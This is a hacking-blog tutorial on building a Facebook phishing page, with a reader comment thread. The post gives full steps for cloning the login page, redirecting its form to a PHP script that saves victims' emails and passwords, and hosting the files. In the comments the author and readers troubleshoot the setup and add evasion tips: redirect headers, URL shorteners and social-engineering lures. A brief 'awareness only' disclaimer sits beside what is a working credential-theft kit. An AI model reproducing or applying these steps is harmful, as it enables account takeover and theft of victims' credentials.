. Latest Facebook phishing page and script | REAL HACKINGS | viruses | computer | tricks | tips | securities | encryption

Latest Facebook phishing page and script

Hi friends, this is our latest article regarding Facebook Phishing attack and we are so glad to announce that we have developed some new phishing script for Facebook which is working 100 %.We have already discussed what is phishing and how to create phishing pages for Gmail, Orkut etc. I don't know how many of you are aware of phishing attacks,Anyway keep in mind that, it is the most common and easiest way to hack anyones personal details.In this article Iam going to share some ideas about Phishing and will show you how to make your own Phishing pages for Facebook.For making Phishing page for any site you need 3 types of files in common.They are
  • .Html file ( ie fake page )
  • .Php file or any other action script page (for tracking the details that entered in page created by you)
  • .Txt file ( To save all the details in text format )
HOW TO MAKE FACEBOOK PHISHING PAGE

1. First goto Facebook login page (make sure that the page is loaded completely) and right click and select view source (in firefox) or view source code option in other browsers.

2. Select all ( CTR + A ) and copy all the code and paste it in notepad.

3. Then search(CTR + F) for the keyword action.You can see the code as given below.

action="https://www.facebook.com/login.php?login_attempt=1"

4. Just change the above code as mentioned below

action="pass.php"

after changing to pass.php (or anyname.php) just save it in the form facebook.html (anyname.html). By finishing this step our phishing page is ready.Now we want to create script page for this phishing page.

5. For creating a php script,just copy the below php code into notepad and save in the format pass.php (name mentioned in action of our phishing page)
<?php
$fp = fopen("Passwords.htm", "a");
fwrite($fp, "Email:$_POST[email]\tPassword:$_POST[pass]");
echo "<HTML>
<head>
<FRAMESET cols=\"*\">
<FRAME SRC=\"http://www.facebook.com\">
</FRAMESET>";
?>
Note:‘http://www.facebook.com‘ is the redirection url,When victim will enter his/her email and password he will redirected to’http://www.facebook.com‘

6.  By this step our PHP script is also ready,

7.  Now host these 2 files ie,
  • facebook.html
  • pass.php
in any of free hosting servers like ripway,drivehq,110 mb or t35.com etc (or any other,just google free hosting).Make sure that these 2 files are in same directory.

8. After hosting you will get a direct link to your phishing page,that is to your facebook.html page.just use this link to access or send phishing page.

9. When anyone tries to login through your phishing page a new html page with name password.html will be automatically created in your hosting directory with the password and username entered there.

NOTE : This detailed tutorial is given only for creating awareness about phishing attacks and please dont do this for any harmful purposes.www.realhackings.com will not be responsible for any such phishing attacks.

56 comments:

johnson said...

wen i save the php file...its getting pass.php.text...

MISHAL@HACKINGS.WORLD said...

When you saving it from notepad,dont directly save it,use save as option and clik all files from the dialog box or just change the view of file extensions and change .txt to .php

for that.goto my computer-tools-folder options-view tab-hide extension for known file types

just untick this and simply change the extension to .php

Fjabbe said...

How do i put the 2 files, into the same directory?
When i enter my username so on for testing, it says that the folder im lookin for cant be found or something like that.

learner said...

wen i save the php file...its getting pass.php.text...

can you please clyrify
to fix this

MISHAL@HACKINGS.WORLD said...

@ Fjabbe
That is you should upload these 2 files in the same directory.which means these files should in same folder or else these 2 files should in root location of your account

MISHAL@HACKINGS.WORLD said...

@learner
It is common that when we save any file from notepad it will automatically save it in .txt format.That is it will be something like pass.php.txt. So its better you change the view of the known extensions so that you can directly press F2 or reaname and delete .txt and so that it will become pass.php

for changing the view of extensions goto

my computer-tools-folder options-view tab-hide extension for known file types

just untick this and simply change the extension to .php

learner said...

thanks
but
my phishing page is not working
i check my account everyday but there is no txt file

MISHAL@HACKINGS.WORLD said...

@ learner

after uploading 2 files click the fake page you have just uploaded and enter anything into it and clik login.Then a new html file will be created in the directory from where you opened the fake page.all you entered in your fake page will be recorded in the new html page.

goto this and see the live demo

http://www.realhackings.com/2011/07/how-to-make-phishing-pages-for.html

ttt said...

I cant host them!:S

HuFfAz BiSkUt GoREnG said...

i cant use the webhosting.it ask me to make a survey.how to remove the survey?/

Tiago Coelho said...

My friend i created the fake account but how can i stop people from seing my URL... because once they see that they do not enter the page.

Thnks

Mehar said...

Hello sir i did every thing completely but when i login with username and password. I dont login in facebook throgh fake page and there are not any new url create

MISHAL@HACKINGS.WORLD said...

@HuFfAz BiSkUt GoREnG and @ tt
Just use any free hosting services.google it you will get tons of free hosting services or use 100mb.com

●๋• รค!ภ╬ இ " คl€к " ▬╡09|>┳╦═─ - - - said...

The main page shows "This form is inoperational!"
http://faecbooks.webs.com/Facebook.html
please have a look and rectify the problem.

000kk said...

I'm trying to do a skydrive page. It doesn't have action= anywhere in the code. Where would I put my php bit so it goes with the path I want? Please help!

rames said...

pls help hoe to host these files ripway not working

rames said...

is it possible for other person who are searching for phisling page to see my account

MISHAL@HACKINGS.WORLD said...

just try www.000webhost.com

MISHAL@HACKINGS.WORLD said...

@ rames
No, never they will get only the link to your page, not your account

Agha Shaheryar said...

hahahha It works Phishing is the easiestw ay to hack now i m using ur other mentioned toOls .........

Specially keylogger :D

Thx Man You roCk serIouslY

katrina said...

how to add them in directory i am not geting it

Krabby Krab said...

super work....

raghuveer nandakumar said...

i installed xampp s/w..i copied the two files in the root dir.. i clicked the fake page and when i clicked login it redirects to pass.php page..

manish sehgal said...

i dont find action word in the source code...help me

manish sehgal said...

how to add files to directory

Krabby Krab said...

dude your scrip failed,correct it...

Sandeep Soni said...

this is really true ....??

Kuhyar Bozorgi said...

My email is kuhyar.bozorgi@gmail.com . I followed the instruction to the letter but the file supposed to contain the password is never created no matter what I do. Could you please let me know what might be wrong???

Vanquisher said...

bro how to add file in same directory and host these file...plz tell me

Md Azeem said...

bro how to add file in same directory and host these file...plz tell!!!

bl4ck1ist said...

Also, if you want it to redirect them to the actual facebook login page after they fake login and send you the pass, put:
header( 'Location: http://www.facebook.com/login.php?login_attempt=1' ) ;
at the end of the php but before the ?>
and then it will be less suspicious.

Yohana Flo said...

I've tried all these phishing tutorials and the username and password never appear in the password.html file, it just appears as blank. Tried several hosting sites and the same thing. I'm just giving up.

Jason Corbeil said...

Use this code (Change the "location" to the redirect of your choice do not delete the ' ' before and after. save as mail.php. add "mail.php" after the "action". So below would be plenty of fish. With the redirection url telling the person they entered the wrong password after sending the their real username and password to your server. For those having issues not being able to find "action". When you hit ctrl-f to find it your bar will be at the bottom so make sure you search "up". If there is no "action" then the login is Javascript coded (any hotmail or live account) its not possible to crack.

$value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Kashif said...

how to upload files brother tell me plz

Kashif said...

i have read almost 25+ article but i dont understand how to upload file

MISHaL PM said...

try www.000webhost.com, it free !!!!! create a free account and upload all the files to your free domain which you will get from them.

Faraz said...

MISHAL@HACKINGS.WORLD Please Help Mee Page Work Fine But There is no redirect to my URL When User Click On Login They come to pass.php Please Fix This Error :(

Sanju said...

try my3gb.com guys

Sanju said...

this trick is working..... try my3gb.com

Sanju said...

how to send index.html file through facebook???? it is showing an error while sending the index.html link through message and chat.... can u help me please????

MISHaL PM said...

@ Faraz

Make sure the hosting you are using has PHP support, If ok, double check your PHP file and make sure the code is exactly the same I mentioned here

MISHaL PM said...

@ sanju

Try url shortening services, just Google it, you will get a hand full of free services

Abroiny Fghi said...

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!ATTENTION!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Ok guys.... this is great and works.... in order to make phishing more effective: How do we change the redirection url to some random page?

So we send the link to someone and say it's some article of portal, or funny video.... and say them that you should log in in fb in order to see the article/video,etc....

SO

Instead of redirecting to that white blank page, how do we make pressing the "log in" button redirect to some random page??????? Thank you!

MISHaL PM said...

See this.
http://www.realhackings.com/2011/07/how-to-make-phishing-pages-for.html

you can add a header location before php closing tag '?>'
header ('Location: http://www.youtube.com ');
This will redirect to youtube. if you give any custom video link. the page will be automatically redirected to that video. Make sure the link starts with 'http://'

ak soni said...

bro how can i host these page...?? please tell me i am waiting for your response

MISHaL PM said...

Use any free hosting with PHP support. eg: www.000webhost.com. Create an free account, you will be given one free account and hosting space. Use Filezilla or any other ftp service to upload all the files to your server.

fahim shahriar said...

bro iv tried everythn possible for this..hav dun everythn..but styl in the end wen i enter my email and password, it duz direct to the pass.php. page...but its completely blank...n no other html files creates !!! plz brother help me in this !!! iv not just tried once..but thrice :(

DHEEERAJ SHARMA said...

i have added the files in the 000webhost site but when i click on the view instead of getting the the fake page i can see the page source script ..why is tht ?? so i cannot use this link as there is no fake pag ei can see when viewed through the hosting website !

MISHaL PM said...

In case of 000webhost, you will be given one free domain. Use that domain to access the pages, its better upload the files using filezila, once logged in 000webhost just note down your FTP details and use filezila to upload files. Once uploaded successfully, the files will available at free domain. Rename main page as index.php or index.html. If you are using different names you can use htaccess file to make it default

MISHaL PM said...

@fahim shahriar

just goto this tutorial

http://www.realhackings.com/2011/07/how-to-make-phishing-pages-for.html

and try for gmail and check its working or not

TechFPD said...

i Cant understand a SHITTTTT

Arsal Hussain said...

Do You Know The Script For Removing Text From URL Bar And Then Again Appending A New Text??
Please Share The Script :)

urgente guarapuava said...

After putting login and password on FB, get the message:

Forbidden

You don't have permission to access /pass.php on this server.

Bee Greed said...

i am unable to get any link of my phishing page... what did i do wrong??

Raoof Nosrati said...

The script is not work (pass.php) please correct it.

sampath kumra said...

when trying to save facebook loign code its automatically getting converted into unicode format how to overcome this

Comment here

NOTE : If you are asking for any help or do have any questions,click the 'Subscribe By Email' link below the comment form to be notified of replies.